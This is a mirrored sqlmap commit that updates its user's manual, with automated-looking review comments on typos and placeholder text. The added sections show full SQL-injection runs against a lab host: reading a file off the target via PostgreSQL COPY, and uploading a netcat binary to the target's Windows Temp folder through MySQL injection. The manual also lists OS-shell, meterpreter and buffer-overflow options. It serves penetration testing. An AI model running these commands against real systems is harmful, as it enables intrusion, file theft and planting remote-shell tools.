mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 11:03:47 +03:00
Minor update to the user's manual, almost there to release 0.7 stable!
This commit is contained in:
parent
b2b2ec8a26
commit
576cc97742
144
doc/README.html
144
doc/README.html
|
@ -8,7 +8,7 @@
|
||||||
<H1>sqlmap user's manual</H1>
|
<H1>sqlmap user's manual</H1>
|
||||||
|
|
||||||
<H2>by
|
<H2>by
|
||||||
<A HREF="mailto:bernardo.damele@gmail.com">Bernardo Damele A. G.</A></H2>version 0.7 release candidate 1, April 22, 2009
|
<A HREF="mailto:bernardo.damele@gmail.com">Bernardo Damele A. G.</A></H2>version 0.7, July 25, 2009
|
||||||
<HR>
|
<HR>
|
||||||
<EM>This document is the user's manual to use
|
<EM>This document is the user's manual to use
|
||||||
<A HREF="http://sqlmap.sourceforge.net">sqlmap</A>.
|
<A HREF="http://sqlmap.sourceforge.net">sqlmap</A>.
|
||||||
|
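Review bot: the header now reads "version 0.7, July 25, 2009" while the commit message says the stable release is only "almost there"; if this manual is regenerated and published before the 0.7 tag exists, readers will see a stable version string on pre-release documentation, so consider keeping a release-candidate label in both this line and the matching README.sgml date line until the tag is cut.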
@ -3950,16 +3950,120 @@ support when the back-end DBMS is PostgreSQL.</P>
|
||||||
|
|
||||||
<P>Option: <CODE>--read-file</CODE></P>
|
<P>Option: <CODE>--read-file</CODE></P>
|
||||||
|
|
||||||
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
|
<P>It is possible to retrieve the content of files from the underlying file
|
||||||
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
|
system when the back-end database management is system is either MySQL,
|
||||||
|
PostgreSQL or Microsoft SQL Server.
|
||||||
|
The file specified can be either a text or a binary file, sqlmap will
|
||||||
|
handle either cases automatically.</P>
|
||||||
|
|
||||||
|
<P>The techniques implemented are detailed on the white paper
|
||||||
|
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
|
||||||
|
|
||||||
|
<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
|
||||||
|
<P>
|
||||||
|
<BLOCKQUOTE><CODE>
|
||||||
|
<PRE>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --read-file \
|
||||||
|
"C:\example.txt" -v2
|
||||||
|
|
||||||
|
[...]
|
||||||
|
[hh:mm:53] [INFO] the back-end DBMS is PostgreSQL
|
||||||
|
web server operating system: Windows 2003 or 2008
|
||||||
|
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
|
||||||
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
|
[hh:mm:53] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[hh:mm:53] [INFO] detecting back-end DBMS version from its banner
|
||||||
|
[hh:mm:53] [DEBUG] query: COALESCE(CAST(SUBSTR((VERSION())::text, 12, 6) AS CHARACTER(10000)),
|
||||||
|
CHR(32))
|
||||||
|
[hh:mm:53] [INFO] retrieved: 8.3.5,
|
||||||
|
[hh:mm:58] [DEBUG] performed 49 queries in 4 seconds
|
||||||
|
[hh:mm:58] [DEBUG] query: SELECT PG_SLEEP(5)
|
||||||
|
[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[hh:mm:03] [INFO] fingerprinting the back-end DBMS operating system
|
||||||
|
[hh:mm:03] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
[hh:mm:03] [DEBUG] query: CREATE TABLE sqlmapfile(data character(500))
|
||||||
|
[hh:mm:03] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
|
||||||
|
[hh:mm:03] [DEBUG] query: SELECT (CASE WHEN ((SELECT LENGTH(data) FROM sqlmapfile WHERE data
|
||||||
|
LIKE CHR(37)||CHR(32)||CHR(86)||CHR(105)||CHR(115)||CHR(117)||CHR(97)||CHR(108)||CHR(32)||
|
||||||
|
CHR(67)||CHR(43)||CHR(43)||CHR(37))>0) THEN 1 ELSE 0 END)
|
||||||
|
[hh:mm:03] [INFO] retrieved: 1
|
||||||
|
[hh:mm:03] [DEBUG] performed 5 queries in 0 seconds
|
||||||
|
[hh:mm:03] [INFO] the back-end DBMS operating system is Windows
|
||||||
|
[hh:mm:03] [DEBUG] cleaning up the database management system
|
||||||
|
[hh:mm:03] [DEBUG] removing support tables
|
||||||
|
[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
[hh:mm:04] [DEBUG] going to read the file with stacked query SQL injection technique
|
||||||
|
[hh:mm:04] [WARNING] binary file read on PostgreSQL is not yet supported, if the requested file
|
||||||
|
is binary, its content will not be retrieved
|
||||||
|
[hh:mm:04] [INFO] fetching file: 'C:/example.txt'
|
||||||
|
[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
[hh:mm:04] [DEBUG] query: CREATE TABLE sqlmapfile(data bytea)
|
||||||
|
[hh:mm:04] [DEBUG] loading the content of file 'C:/example.txt' into support table
|
||||||
|
[hh:mm:04] [DEBUG] query: COPY sqlmapfile(data) FROM 'C:/example.txt'
|
||||||
|
[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(COUNT(data) AS CHARACTER(10000)), CHR(32)) FROM
|
||||||
|
sqlmapfile
|
||||||
|
[hh:mm:04] [INFO] retrieved: 1
|
||||||
|
[hh:mm:04] [DEBUG] performed 6 queries in 0 seconds
|
||||||
|
[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(ENCODE(data, CHR(98)||CHR(97)||CHR(115)||CHR(101)
|
||||||
|
||CHR(54)||CHR(52)) AS CHARACTER(10000)), CHR(32)) FROM sqlmapfile OFFSET 0 LIMIT 1
|
||||||
|
[hh:mm:04] [INFO] retrieved: VGhpcyBpcyBhIHRleHQgZmlsZQ==
|
||||||
|
[hh:mm:22] [DEBUG] performed 203 queries in 18 seconds
|
||||||
|
[hh:mm:22] [DEBUG] cleaning up the database management system
|
||||||
|
[hh:mm:22] [DEBUG] removing support tables
|
||||||
|
[hh:mm:22] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
C:/example.txt file saved to: '/home/inquis/sqlmap/output/192.168.1.121/files/C__example.txt'
|
||||||
|
|
||||||
|
[hh:mm:22] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/192.168.1.121'
|
||||||
|
|
||||||
|
$ cat output/192.168.1.121/files/C__example.txt
|
||||||
|
This is a text file
|
||||||
|
</PRE>
|
||||||
|
</CODE></BLOCKQUOTE>
|
||||||
|
</P>
|
||||||
|
|
||||||
|
|
||||||
<H3>Write a local file on the back-end DBMS file system</H3>
|
<H3>Write a local file on the back-end DBMS file system</H3>
|
||||||
|
|
||||||
<P>Options: <CODE>--write-file</CODE> and <CODE>--dest-file</CODE></P>
|
<P>Options: <CODE>--write-file</CODE> and <CODE>--dest-file</CODE></P>
|
||||||
|
|
||||||
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
|
<P>It is possible to upload a local file to the underlying file system when
|
||||||
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
|
the back-end database management is system is either MySQL, PostgreSQL or
|
||||||
|
Microsoft SQL Server.
|
||||||
|
The file specified can be either a text or a binary file, sqlmap will
|
||||||
|
handle either cases automatically.</P>
|
||||||
|
|
||||||
|
<P>The techniques implemented are detailed on the white paper
|
||||||
|
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
|
||||||
|
|
||||||
|
<P>Example on a <B>MySQL 5.0.67</B> target:</P>
|
||||||
|
<P>
|
||||||
|
<BLOCKQUOTE><CODE>
|
||||||
|
<PRE>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --write-file \
|
||||||
|
"/home/inquis/software/netcat/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1
|
||||||
|
|
||||||
|
[...]
|
||||||
|
[01:12:29] [INFO] the back-end DBMS is MySQL
|
||||||
|
web server operating system: Windows 2003 or 2008
|
||||||
|
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
|
||||||
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
|
[01:12:29] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[01:12:29] [INFO] detecting back-end DBMS version from its banner
|
||||||
|
[01:12:29] [INFO] retrieved: 5.0.67
|
||||||
|
[01:12:36] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[01:12:36] [INFO] fingerprinting the back-end DBMS operating system
|
||||||
|
[01:12:36] [INFO] retrieved: C
|
||||||
|
[01:12:36] [INFO] the back-end DBMS operating system is Windows
|
||||||
|
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully
|
||||||
|
written on the back-end DBMS file system? [Y/n] y
|
||||||
|
[01:12:52] [INFO] retrieved: 31744
|
||||||
|
[01:12:52] [INFO] the file has been successfully written and its size is 31744 bytes, same
|
||||||
|
size as the local file '/home/inquis/software/netcat/nc.exe.packed'
|
||||||
|
</PRE>
|
||||||
|
</CODE></BLOCKQUOTE>
|
||||||
|
</P>
|
||||||
|
|
||||||
|
|
||||||
<H2><A NAME="ss5.9">5.9</A> <A HREF="#toc5.9">Operating system access</A>
|
<H2><A NAME="ss5.9">5.9</A> <A HREF="#toc5.9">Operating system access</A>
|
||||||
|
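Review bot: the new --read-file paragraph says "The file specified can be either a text or a binary file, sqlmap will handle either cases automatically", but the PostgreSQL transcript a few lines below prints "[WARNING] binary file read on PostgreSQL is not yet supported, if the requested file is binary, its content will not be retrieved"; qualify the paragraph (binary read is supported on MySQL and Microsoft SQL Server, text only on PostgreSQL for now) rather than leaving the claim and the tool output in disagreement. Same paragraph and the --write-file one: "the back-end database management is system is either" has a stray "is", and "handle either cases" should be "handle either case". Minor: the two example invocations use "-v2" and "-v 1"; pick one spelling of the verbosity flag for the manual.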
@ -3969,40 +4073,50 @@ support when the back-end DBMS is PostgreSQL.</P>
|
||||||
|
|
||||||
<P>Option: <CODE>--os-cmd</CODE></P>
|
<P>Option: <CODE>--os-cmd</CODE></P>
|
||||||
|
|
||||||
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
|
<P>TODO</P>
|
||||||
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
|
|
||||||
|
<P>The techniques implemented are detailed on the white paper
|
||||||
|
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
|
||||||
|
|
||||||
|
|
||||||
<H3>Prompt for an interactive operating system shell</H3>
|
<H3>Prompt for an interactive operating system shell</H3>
|
||||||
|
|
||||||
<P>Option: <CODE>--os-shell</CODE></P>
|
<P>Option: <CODE>--os-shell</CODE></P>
|
||||||
|
|
||||||
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
|
<P>TODO</P>
|
||||||
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
|
|
||||||
|
<P>The techniques implemented are detailed on the white paper
|
||||||
|
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
|
||||||
|
|
||||||
|
|
||||||
<H3>Prompt for an out-of-band shell, meterpreter or VNC</H3>
|
<H3>Prompt for an out-of-band shell, meterpreter or VNC</H3>
|
||||||
|
|
||||||
<P>Options: <CODE>--os-pwn</CODE>, <CODE>--priv-esc</CODE>, <CODE>--msf-path</CODE> and <CODE>--tmp-path</CODE></P>
|
<P>Options: <CODE>--os-pwn</CODE>, <CODE>--priv-esc</CODE>, <CODE>--msf-path</CODE> and <CODE>--tmp-path</CODE></P>
|
||||||
|
|
||||||
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
|
<P>TODO</P>
|
||||||
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
|
|
||||||
|
<P>The techniques implemented are detailed on the white paper
|
||||||
|
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
|
||||||
|
|
||||||
|
|
||||||
<H3>One click prompt for an out-of-band shell, meterpreter or VNC</H3>
|
<H3>One click prompt for an out-of-band shell, meterpreter or VNC</H3>
|
||||||
|
|
||||||
<P>Options: <CODE>--os-smbrelay</CODE>, <CODE>--priv-esc</CODE> and <CODE>--msf-path</CODE></P>
|
<P>Options: <CODE>--os-smbrelay</CODE>, <CODE>--priv-esc</CODE> and <CODE>--msf-path</CODE></P>
|
||||||
|
|
||||||
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
|
<P>TODO</P>
|
||||||
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
|
|
||||||
|
<P>The techniques implemented are detailed on the white paper
|
||||||
|
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
|
||||||
|
|
||||||
|
|
||||||
<H3>Stored procedure buffer overflow exploitation</H3>
|
<H3>Stored procedure buffer overflow exploitation</H3>
|
||||||
|
|
||||||
<P>Options: <CODE>--os-bof</CODE>, <CODE>--priv-esc</CODE> and <CODE>--msf-path</CODE></P>
|
<P>Options: <CODE>--os-bof</CODE>, <CODE>--priv-esc</CODE> and <CODE>--msf-path</CODE></P>
|
||||||
|
|
||||||
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
|
<P>TODO</P>
|
||||||
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
|
|
||||||
|
<P>The techniques implemented are detailed on the white paper
|
||||||
|
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
|
||||||
|
|
||||||
|
|
||||||
<H2><A NAME="ss5.10">5.10</A> <A HREF="#toc5.10">Miscellaneous</A>
|
<H2><A NAME="ss5.10">5.10</A> <A HREF="#toc5.10">Miscellaneous</A>
|
||||||
|
|
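Review bot: the five operating-system-access sections (--os-cmd, --os-shell, --os-pwn, --os-smbrelay, --os-bof) now render a bare "TODO" paragraph in the user's manual, which is a regression from the removed sentence that at least told the reader to consult the white paper. Since the following paragraph already links the white paper, either drop the TODO paragraph entirely or replace it with one sentence per option restating what the H3 heading already says (e.g. that --os-shell prompts for an interactive operating system shell), so that the generated HTML and PDF do not ship with placeholder text.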
BIN
doc/README.pdf
BIN
doc/README.pdf
Binary file not shown.
140
doc/README.sgml
140
doc/README.sgml
|
@ -4,7 +4,7 @@
|
||||||
|
|
||||||
<title>sqlmap user's manual
|
<title>sqlmap user's manual
|
||||||
<author>by <htmlurl url="mailto:bernardo.damele@gmail.com" name="Bernardo Damele A. G.">
|
<author>by <htmlurl url="mailto:bernardo.damele@gmail.com" name="Bernardo Damele A. G.">
|
||||||
<date>version 0.7 release candidate 1, April 22, 2009
|
<date>version 0.7, July 25, 2009
|
||||||
<abstract>
|
<abstract>
|
||||||
This document is the user's manual to use <htmlurl url="http://sqlmap.sourceforge.net" name="sqlmap">.
|
This document is the user's manual to use <htmlurl url="http://sqlmap.sourceforge.net" name="sqlmap">.
|
||||||
Check the project <htmlurl url="http://sqlmap.sourceforge.net" name="homepage">
|
Check the project <htmlurl url="http://sqlmap.sourceforge.net" name="homepage">
|
||||||
|
@ -3846,7 +3846,76 @@ support when the back-end DBMS is PostgreSQL.
|
||||||
Option: <tt>--read-file</tt>
|
Option: <tt>--read-file</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper <htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control"> for the moment.
|
It is possible to retrieve the content of files from the underlying file
|
||||||
|
system when the back-end database management is system is either MySQL,
|
||||||
|
PostgreSQL or Microsoft SQL Server.
|
||||||
|
The file specified can be either a text or a binary file, sqlmap will
|
||||||
|
handle either cases automatically.
|
||||||
|
|
||||||
|
<p>
|
||||||
|
The techniques implemented are detailed on the white paper
|
||||||
|
<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control">.
|
||||||
|
|
||||||
|
<p>
|
||||||
|
Example on a <bf>PostgreSQL 8.3.5</bf> target:
|
||||||
|
|
||||||
|
<tscreen><verb>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --read-file \
|
||||||
|
"C:\example.txt" -v2
|
||||||
|
|
||||||
|
[...]
|
||||||
|
[hh:mm:53] [INFO] the back-end DBMS is PostgreSQL
|
||||||
|
web server operating system: Windows 2003 or 2008
|
||||||
|
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
|
||||||
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
|
[hh:mm:53] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[hh:mm:53] [INFO] detecting back-end DBMS version from its banner
|
||||||
|
[hh:mm:53] [DEBUG] query: COALESCE(CAST(SUBSTR((VERSION())::text, 12, 6) AS CHARACTER(10000)),
|
||||||
|
CHR(32))
|
||||||
|
[hh:mm:53] [INFO] retrieved: 8.3.5,
|
||||||
|
[hh:mm:58] [DEBUG] performed 49 queries in 4 seconds
|
||||||
|
[hh:mm:58] [DEBUG] query: SELECT PG_SLEEP(5)
|
||||||
|
[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[hh:mm:03] [INFO] fingerprinting the back-end DBMS operating system
|
||||||
|
[hh:mm:03] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
[hh:mm:03] [DEBUG] query: CREATE TABLE sqlmapfile(data character(500))
|
||||||
|
[hh:mm:03] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
|
||||||
|
[hh:mm:03] [DEBUG] query: SELECT (CASE WHEN ((SELECT LENGTH(data) FROM sqlmapfile WHERE data
|
||||||
|
LIKE CHR(37)||CHR(32)||CHR(86)||CHR(105)||CHR(115)||CHR(117)||CHR(97)||CHR(108)||CHR(32)||
|
||||||
|
CHR(67)||CHR(43)||CHR(43)||CHR(37))>0) THEN 1 ELSE 0 END)
|
||||||
|
[hh:mm:03] [INFO] retrieved: 1
|
||||||
|
[hh:mm:03] [DEBUG] performed 5 queries in 0 seconds
|
||||||
|
[hh:mm:03] [INFO] the back-end DBMS operating system is Windows
|
||||||
|
[hh:mm:03] [DEBUG] cleaning up the database management system
|
||||||
|
[hh:mm:03] [DEBUG] removing support tables
|
||||||
|
[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
[hh:mm:04] [DEBUG] going to read the file with stacked query SQL injection technique
|
||||||
|
[hh:mm:04] [WARNING] binary file read on PostgreSQL is not yet supported, if the requested file
|
||||||
|
is binary, its content will not be retrieved
|
||||||
|
[hh:mm:04] [INFO] fetching file: 'C:/example.txt'
|
||||||
|
[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
[hh:mm:04] [DEBUG] query: CREATE TABLE sqlmapfile(data bytea)
|
||||||
|
[hh:mm:04] [DEBUG] loading the content of file 'C:/example.txt' into support table
|
||||||
|
[hh:mm:04] [DEBUG] query: COPY sqlmapfile(data) FROM 'C:/example.txt'
|
||||||
|
[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(COUNT(data) AS CHARACTER(10000)), CHR(32)) FROM
|
||||||
|
sqlmapfile
|
||||||
|
[hh:mm:04] [INFO] retrieved: 1
|
||||||
|
[hh:mm:04] [DEBUG] performed 6 queries in 0 seconds
|
||||||
|
[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(ENCODE(data, CHR(98)||CHR(97)||CHR(115)||CHR(101)
|
||||||
|
||CHR(54)||CHR(52)) AS CHARACTER(10000)), CHR(32)) FROM sqlmapfile OFFSET 0 LIMIT 1
|
||||||
|
[hh:mm:04] [INFO] retrieved: VGhpcyBpcyBhIHRleHQgZmlsZQ==
|
||||||
|
[hh:mm:22] [DEBUG] performed 203 queries in 18 seconds
|
||||||
|
[hh:mm:22] [DEBUG] cleaning up the database management system
|
||||||
|
[hh:mm:22] [DEBUG] removing support tables
|
||||||
|
[hh:mm:22] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
C:/example.txt file saved to: '/home/inquis/sqlmap/output/192.168.1.121/files/C__example.txt'
|
||||||
|
|
||||||
|
[hh:mm:22] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/192.168.1.121'
|
||||||
|
|
||||||
|
$ cat output/192.168.1.121/files/C__example.txt
|
||||||
|
This is a text file
|
||||||
|
</verb></tscreen>
|
||||||
|
|
||||||
|
|
||||||
<sect2>Write a local file on the back-end DBMS file system
|
<sect2>Write a local file on the back-end DBMS file system
|
||||||
|
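Review bot: this SGML is the source of the --read-file text in the README.html hunk and carries the same defects: the unconditional "either a text or a binary file ... handle either cases automatically" claim is contradicted by the PostgreSQL transcript's "[WARNING] binary file read on PostgreSQL is not yet supported", and "the back-end database management is system is either" has a stray "is"; fixing them here means the regenerated HTML and PDF pick up the corrections as well.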
@ -3855,7 +3924,42 @@ This paragraph will be written for sqlmap 0.7 stable version, refer to the white
|
||||||
Options: <tt>--write-file</tt> and <tt>--dest-file</tt>
|
Options: <tt>--write-file</tt> and <tt>--dest-file</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper <htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control"> for the moment.
|
It is possible to upload a local file to the underlying file system when
|
||||||
|
the back-end database management is system is either MySQL, PostgreSQL or
|
||||||
|
Microsoft SQL Server.
|
||||||
|
The file specified can be either a text or a binary file, sqlmap will
|
||||||
|
handle either cases automatically.
|
||||||
|
|
||||||
|
<p>
|
||||||
|
The techniques implemented are detailed on the white paper
|
||||||
|
<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control">.
|
||||||
|
|
||||||
|
<p>
|
||||||
|
Example on a <bf>MySQL 5.0.67</bf> target:
|
||||||
|
|
||||||
|
<tscreen><verb>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --write-file \
|
||||||
|
"/home/inquis/software/netcat/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1
|
||||||
|
|
||||||
|
[...]
|
||||||
|
[01:12:29] [INFO] the back-end DBMS is MySQL
|
||||||
|
web server operating system: Windows 2003 or 2008
|
||||||
|
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
|
||||||
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
|
[01:12:29] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[01:12:29] [INFO] detecting back-end DBMS version from its banner
|
||||||
|
[01:12:29] [INFO] retrieved: 5.0.67
|
||||||
|
[01:12:36] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[01:12:36] [INFO] fingerprinting the back-end DBMS operating system
|
||||||
|
[01:12:36] [INFO] retrieved: C
|
||||||
|
[01:12:36] [INFO] the back-end DBMS operating system is Windows
|
||||||
|
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully
|
||||||
|
written on the back-end DBMS file system? [Y/n] y
|
||||||
|
[01:12:52] [INFO] retrieved: 31744
|
||||||
|
[01:12:52] [INFO] the file has been successfully written and its size is 31744 bytes, same
|
||||||
|
size as the local file '/home/inquis/software/netcat/nc.exe.packed'
|
||||||
|
</verb></tscreen>
|
||||||
|
|
||||||
|
|
||||||
<sect1>Operating system access
|
<sect1>Operating system access
|
||||||
|
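Review bot: the --write-file paragraph should say what the "successfully written" confirmation in the transcript actually checks, which from the visible output is only that the retrieved remote size (31744) equals the local file size; a reader may otherwise take the message as a content check. Also "the back-end database management is system is either" has a stray "is", "handle either cases" should be "handle either case", and this example uses "-v 1" where the --read-file example uses "-v2".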
@ -3866,7 +3970,11 @@ This paragraph will be written for sqlmap 0.7 stable version, refer to the white
|
||||||
Option: <tt>--os-cmd</tt>
|
Option: <tt>--os-cmd</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper <htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control"> for the moment.
|
TODO
|
||||||
|
|
||||||
|
<p>
|
||||||
|
The techniques implemented are detailed on the white paper
|
||||||
|
<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control">.
|
||||||
|
|
||||||
|
|
||||||
<sect2>Prompt for an interactive operating system shell
|
<sect2>Prompt for an interactive operating system shell
|
||||||
|
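Review bot: replacing the placeholder sentence with a bare "TODO" leaves placeholder text in the generated manual for the release the commit message describes as almost stable; since the next paragraph already links the white paper, drop the TODO paragraph or put a one-line description of the option in its place. The same applies to the four --os-shell, --os-pwn, --os-smbrelay and --os-bof hunks that follow in this file.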
@ -3875,7 +3983,11 @@ This paragraph will be written for sqlmap 0.7 stable version, refer to the white
|
||||||
Option: <tt>--os-shell</tt>
|
Option: <tt>--os-shell</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper <htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control"> for the moment.
|
TODO
|
||||||
|
|
||||||
|
<p>
|
||||||
|
The techniques implemented are detailed on the white paper
|
||||||
|
<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control">.
|
||||||
|
|
||||||
|
|
||||||
<sect2>Prompt for an out-of-band shell, meterpreter or VNC
|
<sect2>Prompt for an out-of-band shell, meterpreter or VNC
|
||||||
|
@ -3884,7 +3996,11 @@ This paragraph will be written for sqlmap 0.7 stable version, refer to the white
|
||||||
Options: <tt>--os-pwn</tt>, <tt>--priv-esc</tt>, <tt>--msf-path</tt> and <tt>--tmp-path</tt>
|
Options: <tt>--os-pwn</tt>, <tt>--priv-esc</tt>, <tt>--msf-path</tt> and <tt>--tmp-path</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper <htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control"> for the moment.
|
TODO
|
||||||
|
|
||||||
|
<p>
|
||||||
|
The techniques implemented are detailed on the white paper
|
||||||
|
<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control">.
|
||||||
|
|
||||||
|
|
||||||
<sect2>One click prompt for an out-of-band shell, meterpreter or VNC
|
<sect2>One click prompt for an out-of-band shell, meterpreter or VNC
|
||||||
|
@ -3893,7 +4009,11 @@ This paragraph will be written for sqlmap 0.7 stable version, refer to the white
|
||||||
Options: <tt>--os-smbrelay</tt>, <tt>--priv-esc</tt> and <tt>--msf-path</tt>
|
Options: <tt>--os-smbrelay</tt>, <tt>--priv-esc</tt> and <tt>--msf-path</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper <htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control"> for the moment.
|
TODO
|
||||||
|
|
||||||
|
<p>
|
||||||
|
The techniques implemented are detailed on the white paper
|
||||||
|
